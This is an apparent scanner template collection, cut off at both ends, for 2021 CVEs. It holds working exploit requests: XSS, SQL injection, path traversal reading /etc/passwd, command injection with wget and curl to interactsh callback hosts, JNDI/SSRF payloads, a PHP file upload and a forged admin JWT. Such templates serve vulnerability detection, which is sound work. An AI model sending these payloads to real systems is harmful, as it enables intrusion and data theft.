<a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n    <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n    <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <w:OptionSet s:mustUnderstand=\"true\"/>\n    <w:SelectorSet>\n      <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n    </w:SelectorSet>\n  </s:Header>\n  <s:Body>\n    <p:ExecuteScript_INPUT\n      xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n      <p:Script>aWQ=</p:Script>\n      <p:Arguments/>\n      <p:timeout>0</p:timeout>\n      <p:b64encoded>true</p:b64encoded>\n    </p:ExecuteScript_INPUT>\n  </s:Body>\n</s:Envelope>\n"],"matchers":[{"type":"word","words":["<p:StdOut>","uid=0(root) gid=0(root) groups=0"],"condition":"and"}]}]},{"id":"CVE-2021-46005","info":{"name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nusername={{username}}&password={{password}}&login=\n","POST /admin/post-avehical.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicletitle\"\n\nTest\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"brandname\"\n\n1\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicalorcview\"\n\n</script><script>alert(document.domain)</script>\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"priceperday\"\n\n500\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"fueltype\"\n\nPetrol\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"modelyear\"\n\n2022\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"seatingcapacity\"\n\n5\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img1\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img2\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img3\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img4\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img5\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"submit\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv--\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42667","info":{"name":"Online Event Booking and Reservation System 2.3.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31856","info":{"name":"Layer5 Meshery 0.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24276","info":{"name":"WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25299","info":{"name":"Nagios XI 5.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24165","info":{"name":"WordPress Ninja Forms <3.4.34 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 302","contains(header_2, 'Location: https://interact.sh?client_id=1')"],"condition":"and"}]}]},{"id":"CVE-2021-28073","info":{"name":"Ntopng Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css","{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"],"matchers-condition":"and","matchers":[{"type":"word","words":["application/json"],"part":"header"},{"type":"word","words":["\"results\":","\"name\":","\"tab\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24288","info":{"name":"WordPress AcyMailing <7.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-28419","info":{"name":"SEO Panel 4.8.0 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: _csrf={{rand_base(54,\"abc\")}};\n","POST /login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}login.php\nCookie: _csrf={{rand_base(54,\"abc\")}};\n\nsec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login=\n","GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1\nHost: {{Hostname}}\nCookie: _csrf={{rand_base(54,\"abc\")}};\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_3>=6","status_code_3 == 200","contains(body_3, \"Overall Report Summary\")"],"condition":"and"}]}]},{"id":"CVE-2021-24351","info":{"name":"WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","the-plus-addons-for-elementor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30461","info":{"name":"VoipMonitor <24.61 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\nSPOOLDIR=test\".system(id).\"&recheck=Recheck\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","VoIPmonitor installation"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24285","info":{"name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44427","info":{"name":"Rosario Student Information System Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/Side.php"],"body":"sidefunc=update&syear=111'","headers":{"Content-Type":"application/x-www-form-urlencoded; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB Execute Failed. ERROR:","unterminated quoted string"],"condition":"and"},{"type":"word","part":"header","words":["RosarioSIS="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24155","info":{"name":"WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921\n\n-----------------------------204200867127808062083805313921\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho \"CVE-2021-24155\";\n\n?>\n\n-----------------------------204200867127808062083805313921--\n","GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_3, '{\\\"success\\\":1}')","contains(body_4, 'CVE-2021-24155')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["BG_BACKUP_STRINGS = {\"nonce\":\"([0-9a-zA-Z]+)\"};"],"internal":true}]}]},{"id":"CVE-2021-41460","info":{"name":"ECShop 4.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /delete_cart_goods.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21799","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Telnet </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34429","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /%u002e/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /.%00/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26855","info":{"name":"Microsoft Exchange Server SSRF Vulnerability","severity":"critical"},"requests":[{"raw":["GET /owa/auth/x.js HTTP/1.1\nHost: {{Hostname}}\nCookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24910","info":{"name":"WordPress Transposh Translation <1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","{\"result\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24554","info":{"name":"WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"paytm-settings_page_wp_paytm_donation\")"],"condition":"and"}]}]},{"id":"CVE-2021-24472","info":{"name":"Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24891","info":{"name":"WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js","{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200"]},{"type":"regex","part":"body_1","regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"],"internal":true},{"type":"kval","kval":["version"]}]}]},{"id":"CVE-2021-21801","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25052","info":{"name":"WordPress Button Generator <2.3.3 - Remote File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35250","info":{"name":"SolarWinds Serv-U 15.3 - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n/?Command=NOOP\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-37580","info":{"name":"Apache ShenYu Admin JWT - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dashboardUser HTTP/1.1\nHost: {{Hostname}}\nX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["query success","\"userName\":\"admin\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20038","info":{"name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"prefix_addr":["%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"],"system_addr":["%08%b7%06%08","%64%b8%06%08"]},"attack":"clusterbomb","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-39146","info":{"name":"XStream 1.4.18 - Arbitrary Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\n      <unserializable-parents/>\n      <hashtable>\n          <default>\n            <loadFactor>0.75</loadFactor>\n            <threshold>525</threshold>\n          </default>\n          <int>700</int>\n          <int>0</int>\n      </hashtable>\n      <javax.swing.UIDefaults>\n          <default>\n            <defaultLocale>zh_CN</defaultLocale>\n            <resourceCache/>\n          </default>\n      </javax.swing.UIDefaults>\n      <javax.swing.MultiUIDefaults>\n          <default>\n            <tables>\n            <javax.swing.UIDefaults serialization='custom'>\n              <unserializable-parents/>\n              <hashtable>\n                <default>\n                  <loadFactor>0.75</loadFactor>\n                  <threshold>525</threshold>\n                </default>\n                <int>700</int>\n                <int>1</int>\n                <string>lazyValue</string>\n                <javax.swing.UIDefaults_-ProxyLazyValue>\n                  <className>javax.naming.InitialContext</className>\n                  <methodName>doLookup</methodName>\n                  <args>\n                    <string>ldap://{{interactsh-url}}/#evil</string>\n                  </args>\n                </javax.swing.UIDefaults_-ProxyLazyValue>\n              </hashtable>\n              <javax.swing.UIDefaults>\n                <default>\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\n                  <resourceCache/>\n                </default>\n              </javax.swing.UIDefaults>\n            </javax.swing.UIDefaults>\n            </tables>\n          </default>\n      </javax.swing.MultiUIDefaults>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24647","info":{"name":"Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_1, \"pieregister\")","contains(body_3, \"Username\") && contains(body_3, \"email-description\")"],"condition":"and"}]}]},{"id":"CVE-2021-40438","info":{"name":"Apache <= 2.4.48 - Mod_Proxy SSRF","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-31537","info":{"name":"SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>confirm({{randstr}})</script>","SIS-REWE"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-20114","info":{"name":"TCExam <= 14.8.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cache/backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /cache/backup","Parent Directory",".sql.gz"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43798","info":{"name":"Grafana v8.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd","{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini","{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:([0-9]+):","\\/tmp\\/grafana\\.sock","\\[(fonts|extensions|Mail|files)\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32305","info":{"name":"Websvn <2.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-31249","info":{"name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: setting.htm","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-45232","info":{"name":"Apache APISIX Dashboard <2.10.1 - API Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/apisix/admin/migrate/export"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Consumers\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41878","info":{"name":"i-Panel Administration System 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=a onerror=alert(\"document.domain\")>","i-Panel Administration"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45967","info":{"name":"Pascom CPS Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37589","info":{"name":"Virtua Software Cobranca <12R - Blind SQL Injection","severity":"high"},"requests":[{"raw":["POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario='&idsenha=test&tipousr=Usuario\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; 